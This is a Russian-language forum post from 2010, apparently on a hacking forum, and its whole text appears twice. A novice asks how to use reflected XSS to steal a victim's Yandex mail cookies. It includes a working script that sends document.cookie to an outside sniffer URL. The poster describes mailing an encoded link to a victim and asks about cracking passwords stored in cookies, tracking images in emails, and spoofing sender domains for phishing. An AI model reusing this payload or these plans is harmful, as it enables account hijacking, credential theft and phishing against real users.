ZeroCold
05.05.2010, 02:16
Доброго времени суток.
Собственно первый раз в жизни решил занятся xss развлечениями.
ПРочитал статью xss для начинающих, остаось несколько вопросв которые хотелось задать сообществу.
Вобщем как я понимаю на яндексе искать активны хсс дело не благодарное, поэтому стоит использовать пассивные.
Собственно первый вопрос, правильно ли я понимаю значение смысла слова пассивные - я создаю скрипт перехвата кук
<script>
img = new Image();
img.src = "http://antichat.org/s/HakNet.gif?"+document.cookie;
</script>
предварителньо запихнув его в какой либо фаил(упс.js)
Затем я делаю линк на этот скрипт, ну и как либо еш шифрую и пердаю жертве. Например почтой.
Теперь вопрос если жертва перейдет по линку я получу куки яндекса жертвы, или я неправильно понимаю смысл слова пассивные?
И еще вопрос, я так понимаю что в коде скрипта надо указать с сылку на снифер т.е. в место "http://antichat.org/s/HakNet.gif?"+document.cookie;
</script> надо написать "http://мойсайт/путь до снифера/подставной указанный в снифере.gif?"+document.cookie;
</script>
Правильно ли я себе представляю работу пассивной xss уязвимости?
Нужно ли указывать гиф при добавлении кода в ifarame?
Хранятся ли пароли Яндекс почты в куках пусть даже в зашефрованном виде и можно ли их вскрыть? в смысле разгадать.
Можно ли добавить какую либо картинку в тело письма что бы получить подобный эффект, при условии что человек снимет ограничение на загрузку картинок?
И последний вопрос до сих пор осталось возможность отправлять письма с "подставных" доменов, т.е. например с того же вконтакта?
Собственно первый раз в жизни решил занятся xss развлечениями.
ПРочитал статью xss для начинающих, остаось несколько вопросв которые хотелось задать сообществу.
Вобщем как я понимаю на яндексе искать активны хсс дело не благодарное, поэтому стоит использовать пассивные.
Собственно первый вопрос, правильно ли я понимаю значение смысла слова пассивные - я создаю скрипт перехвата кук
<script>
img = new Image();
img.src = "http://antichat.org/s/HakNet.gif?"+document.cookie;
</script>
предварителньо запихнув его в какой либо фаил(упс.js)
Затем я делаю линк на этот скрипт, ну и как либо еш шифрую и пердаю жертве. Например почтой.
Теперь вопрос если жертва перейдет по линку я получу куки яндекса жертвы, или я неправильно понимаю смысл слова пассивные?
И еще вопрос, я так понимаю что в коде скрипта надо указать с сылку на снифер т.е. в место "http://antichat.org/s/HakNet.gif?"+document.cookie;
</script> надо написать "http://мойсайт/путь до снифера/подставной указанный в снифере.gif?"+document.cookie;
</script>
Правильно ли я себе представляю работу пассивной xss уязвимости?
Нужно ли указывать гиф при добавлении кода в ifarame?
Хранятся ли пароли Яндекс почты в куках пусть даже в зашефрованном виде и можно ли их вскрыть? в смысле разгадать.
Можно ли добавить какую либо картинку в тело письма что бы получить подобный эффект, при условии что человек снимет ограничение на загрузку картинок?
И последний вопрос до сих пор осталось возможность отправлять письма с "подставных" доменов, т.е. например с того же вконтакта?